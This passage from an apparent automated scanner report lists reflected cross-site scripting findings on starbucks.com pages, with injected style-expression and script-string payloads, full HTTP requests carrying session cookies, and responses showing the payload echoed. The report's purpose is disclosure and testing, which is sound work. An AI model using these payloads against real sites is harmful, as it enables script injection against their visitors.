<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait?74433"style="x:expression(alert(1))"de32106119b=1"/>
...[SNIP]...

1.893. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 604b3"style%3d"x%3aexpression(alert(1))"1631ed89de3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 604b3"style="x:expression(alert(1))"1631ed89de3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/nutrition?604b3"style%3d"x%3aexpression(alert(1))"1631ed89de3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:13 GMT
Connection: close
Content-Length: 49499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition?604b3"style="x:expression(alert(1))"1631ed89de3=1"/>
...[SNIP]...

1.894. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/20-under-200

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 460c8"style%3d"x%3aexpression(alert(1))"93db86d9ebc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 460c8"style="x:expression(alert(1))"93db86d9ebc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/nutrition/20-under-200?460c8"style%3d"x%3aexpression(alert(1))"93db86d9ebc=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:55 GMT
Connection: close
Content-Length: 38413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/20-under-200?460c8"style="x:expression(alert(1))"93db86d9ebc=1"/>
...[SNIP]...

1.895. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/35-under-350

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d273"style%3d"x%3aexpression(alert(1))"805418c9f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d273"style="x:expression(alert(1))"805418c9f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/nutrition/35-under-350?4d273"style%3d"x%3aexpression(alert(1))"805418c9f1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:42 GMT
Connection: close
Content-Length: 40944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/35-under-350?4d273"style="x:expression(alert(1))"805418c9f1=1"/>
...[SNIP]...

1.896. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d09aa"style%3d"x%3aexpression(alert(1))"81477c5bd4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d09aa"style="x:expression(alert(1))"81477c5bd4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility?d09aa"style%3d"x%3aexpression(alert(1))"81477c5bd4b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:26 GMT
Connection: close
Content-Length: 60882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility?d09aa"style="x:expression(alert(1))"81477c5bd4b=1" />
...[SNIP]...

1.897. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82ef5"%3balert(1)//49dd8543659 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82ef5";alert(1)//49dd8543659 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /responsibility?82ef5"%3balert(1)//49dd8543659=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:28 GMT
Connection: close
Content-Length: 60787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
xt/javascript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96759748001";
   flashvars.playerLocation = "http://www.starbucks.com/responsibility?82ef5";alert(1)//49dd8543659=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

1.898. http://www.starbucks.com/responsibility/community [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 372ca"style%3d"x%3aexpression(alert(1))"73e95ed1bd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 372ca"style="x:expression(alert(1))"73e95ed1bd6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/community?372ca"style%3d"x%3aexpression(alert(1))"73e95ed1bd6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:40 GMT
Connection: close
Content-Length: 40476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community?372ca"style="x:expression(alert(1))"73e95ed1bd6=1"/>
...[SNIP]...

1.899. http://www.starbucks.com/responsibility/community/community-service [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/community-service

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 656dc"style%3d"x%3aexpression(alert(1))"0bb7acaed5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 656dc"style="x:expression(alert(1))"0bb7acaed5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/community/community-service?656dc"style%3d"x%3aexpression(alert(1))"0bb7acaed5f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:03 GMT
Connection: close
Content-Length: 37533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/community-service?656dc"style="x:expression(alert(1))"0bb7acaed5f=1"/>
...[SNIP]...

1.900. http://www.starbucks.com/responsibility/community/ethos-water-fund [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/ethos-water-fund

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81e52"style%3d"x%3aexpression(alert(1))"55e877cb972 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81e52"style="x:expression(alert(1))"55e877cb972 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/community/ethos-water-fund?81e52"style%3d"x%3aexpression(alert(1))"55e877cb972=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:36 GMT
Connection: close
Content-Length: 36863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/ethos-water-fund?81e52"style="x:expression(alert(1))"55e877cb972=1"/>
...[SNIP]...

1.901. http://www.starbucks.com/responsibility/community/starbucks-foundation [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-foundation

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 711af"style%3d"x%3aexpression(alert(1))"aa02c4b265c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 711af"style="x:expression(alert(1))"aa02c4b265c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/community/starbucks-foundation?711af"style%3d"x%3aexpression(alert(1))"aa02c4b265c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:29 GMT
Connection: close
Content-Length: 39409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/starbucks-foundation?711af"style="x:expression(alert(1))"aa02c4b265c=1"/>
...[SNIP]...

1.902. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-red

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7705d"style%3d"x%3aexpression(alert(1))"c7aa8f5b401 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7705d"style="x:expression(alert(1))"c7aa8f5b401 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/community/starbucks-red?7705d"style%3d"x%3aexpression(alert(1))"c7aa8f5b401=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:17 GMT
Connection: close
Content-Length: 41929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/starbucks-red?7705d"style="x:expression(alert(1))"c7aa8f5b401=1"/>
...[SNIP]...

1.903. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-red

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3411b"%3balert(1)//7724a630612 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3411b";alert(1)//7724a630612 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /responsibility/community/starbucks-red?3411b"%3balert(1)//7724a630612=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:20 GMT
Connection: close
Content-Length: 41834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
r flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96759750001";
   flashvars.playerLocation = "http://www.starbucks.com/responsibility/community/starbucks-red?3411b";alert(1)//7724a630612=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

1.904. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/youth-action

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c5f1"style%3d"x%3aexpression(alert(1))"fee707305da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6c5f1"style="x:expression(alert(1))"fee707305da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/community/youth-action?6c5f1"style%3d"x%3aexpression(alert(1))"fee707305da=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:25 GMT
Connection: close
Content-Length: 40145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/youth-action?6c5f1"style="x:expression(alert(1))"fee707305da=1"/>
...[SNIP]...

1.905. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/youth-action

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bc26"%3balert(1)//a20621fb850 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6bc26";alert(1)//a20621fb850 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /responsibility/community/youth-action?6bc26"%3balert(1)//a20621fb850=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:26 GMT
Connection: close
Content-Length: 40050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
ar flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96890010001";
   flashvars.playerLocation = "http://www.starbucks.com/responsibility/community/youth-action?6bc26";alert(1)//a20621fb850=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

1.906. http://www.starbucks.com/responsibility/diversity [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/diversity

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2434"style%3d"x%3aexpression(alert(1))"9d972ae0d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b2434"style="x:expression(alert(1))"9d972ae0d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/diversity?b2434"style%3d"x%3aexpression(alert(1))"9d972ae0d9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:54 GMT
Connection: close
Content-Length: 38155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/diversity?b2434"style="x:expression(alert(1))"9d972ae0d9=1"/>
...[SNIP]...

1.907. http://www.starbucks.com/responsibility/diversity/suppliers [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/diversity/suppliers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ab1f"style%3d"x%3aexpression(alert(1))"18d18debd9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ab1f"style="x:expression(alert(1))"18d18debd9f in the application's response.

